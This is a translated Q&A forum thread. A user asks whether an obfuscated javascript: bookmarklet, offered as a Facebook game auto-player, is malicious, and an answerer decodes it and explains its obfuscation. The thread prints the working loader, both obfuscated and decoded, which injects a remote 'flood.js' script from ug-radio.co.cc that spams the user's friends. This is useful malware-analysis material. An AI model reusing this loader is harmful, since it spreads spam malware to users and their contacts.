我发现它在一个论坛告诉我这个代码会给我自己玩Facebook游戏,但我担心这不是他们说的,我担心这是恶意脚本
请帮忙 :)
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
Guf*_*ffa 12
让我们从解码转义序列开始,并删除该_0x8dd5变量名称:
var x=[
"src","script","createElement","http://ug-radio.co.cc/flood.js",
"appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);
替换数组中的字符串,您将得到:
(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);
那么,脚本的作用很简单:
a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);
即它http://ug-radio.co.cc/flood.js在页面中加载Javascript .
查看加载文件中的脚本,它将自己称为"Wallflood By X-Cisadane".它似乎得到了你的朋友列表,并向所有人发送消息(或者可能来自).
当然与游戏的自动游戏无关.
我打开了firebug,并将部分脚本粘贴到控制台中(小心只粘贴创建变量的部分,而不是运行代码).这就是我得到的:
我粘贴的是什么:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
结果:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
简而言之,这看起来像是从具有非常狡猾的域名的远程服务器加载外部Javascript文件的脚本.
有一些字符没有完全转换为您期望的字符.这可能是错别字(不太可能)或故意进一步混淆,欺骗任何自动恶意软件检查程序查找包含URL或引用createElement等的脚本.脚本的其余部分在运行之前将这些字符单独修复回原位.
_0x8dd5选择变量名称看起来像十六进制代码并使整个事情更难阅读,但实际上它只是一个常规的Javascript变量名称.它在脚本的其余部分重复引用,因为它将字符从字符串的一部分复制到另一部分以修复故意的间隙.
绝对是恶意脚本.
我建议马上把它烧掉!;-)
| 归档时间: |
|
| 查看次数: |
5028 次 |
| 最近记录: |